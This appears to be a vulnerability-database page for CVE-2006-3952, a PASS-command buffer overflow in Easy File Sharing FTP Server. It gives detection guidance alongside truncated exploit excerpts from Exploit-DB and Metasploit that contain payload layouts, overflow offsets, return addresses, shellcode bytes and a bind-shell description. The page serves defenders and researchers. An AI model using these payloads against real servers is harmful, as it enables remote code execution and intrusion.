CVE-2006-3952
published 2006-08-01CVE-2006-3952: Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.07%
99.2th percentile
Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efs_software | efs_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x2c followed by NOP sled (0x90 * 2571) + shellcode + EIP
bytes↗
\x2c + rand_text_english(2559) + \xeb\x12 + make_nops(2) + [target.ret].pack('V') + payload.encodedbytes↗
\x2c + 'A'*2559 + \xeb\x19\x90\x90 + struct.pack('<I', 0x10017F21) + \x90*30 + shellcode- →Detect exploitation attempts by monitoring FTP PASS commands with payloads exceeding ~2559 bytes, particularly those beginning with byte 0x2c. ↗
- →FTP banner check: if the server banner contains 'Easy File Sharing FTP Server', the service is potentially vulnerable. ↗
- →Exploit requires anonymous FTP login; monitor for USER anonymous followed by an oversized PASS command. ↗
- →The exploit payload consistently starts with byte 0x2c as the first character of the PASS argument; this can serve as a signature byte in network detection rules. ↗
- →Monitor for outbound connections on TCP port 4444 from the FTP server process, indicating a successful bind-shell payload execution. ↗
- →The overflow offset is consistently ~2559 bytes before the SEH/EIP overwrite; a PASS argument of this length or greater is anomalous and should be alerted. ↗
- ·Return addresses are OS/SP-specific; the exploit must be tuned per target platform. Three distinct RET values are documented across exploits. ↗
- ·Payload bad characters must be avoided; the Metasploit module documents the full bad character set for encoder selection. ↗
- ·The original PoC was tested only on Windows XP SP2 Polish; reliability on other locales/service packs requires different RET addresses. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow
exploitdb·2014-05-27·CVSS 7.5
CVE-2006-3952 [HIGH] Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow
Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow
---
#!/usr/bin/env python
# Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow
# Date: 27 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vulnerability discovered by: h07
# CVE: CVE-2006-3952
# OSVDB: 27646
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.efssoft.com/ftpserver.htm
# Version: 3.5
# Tested on: Windows 8.1 Enterprise , English
# : Windows 7 Enterprise SP1, English
# : Windows XP SP3, English
#
# Description:
# A buffer overflow is triggered when when a large password is sent to the
# server.
#
# h07 found this bug in 2006, targetting EFS FTP Server 2.0. The original
# exploits relied on OS DLLs to reference a pop/pop/retn address to leverage a
# SEH
Exploit-DB
Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-3952 Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)
Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)
---
##
# $Id: easyfilesharing_pass.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Easy File Sharing FTP Server 2.0 PASS Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Easy File Sharing 2.0
service. By sending an overly long password, an attacker can execute
arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2006-3952' ],
[ 'OSVDB', '
Exploit-DB
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
exploitdb·2007-03-26
CVE-2006-3952 Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42
Exploit-DB
Easy File Sharing FTP Server 2.0 - 'PASS' Remote
exploitdb·2006-08-21
CVE-2006-3952 Easy File Sharing FTP Server 2.0 - 'PASS' Remote
Easy File Sharing FTP Server 2.0 - 'PASS' Remote
---
#!/usr/bin/python
#Easy File Sharing FTP Server 2.0 (PASS) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Bug found by h07
#Tested on XP SP2 polish
#Date: 28.07.2006
#
#BUFF([PASS + 0x20]+[0x2c]+[NOP * 2571]+[0x41414141]+[\r\n])
#EIP = 0x41414141
host = "127.0.0.1"
port = 21
len_recv = 1024
user_name = "anonymous"
NOP_LEN = 2571
EIP = 0x77AB367B #popad pop ret (CRYPT32.DLL) XP SP2 polish
from socket import *
shellcode = ( #execute calc.exe
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\x
Metasploit
Easy File Sharing FTP Server 2.0 PASS Overflow
metasploit
Easy File Sharing FTP Server 2.0 PASS Overflow
Easy File Sharing FTP Server 2.0 PASS Overflow
This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/21289http://www.osvdb.org/27646http://www.securityfocus.com/bid/19243http://www.vupen.com/english/advisories/2006/3068https://exchange.xforce.ibmcloud.com/vulnerabilities/28084http://secunia.com/advisories/21289http://www.osvdb.org/27646http://www.securityfocus.com/bid/19243http://www.vupen.com/english/advisories/2006/3068https://exchange.xforce.ibmcloud.com/vulnerabilities/28084
2006-08-01
Published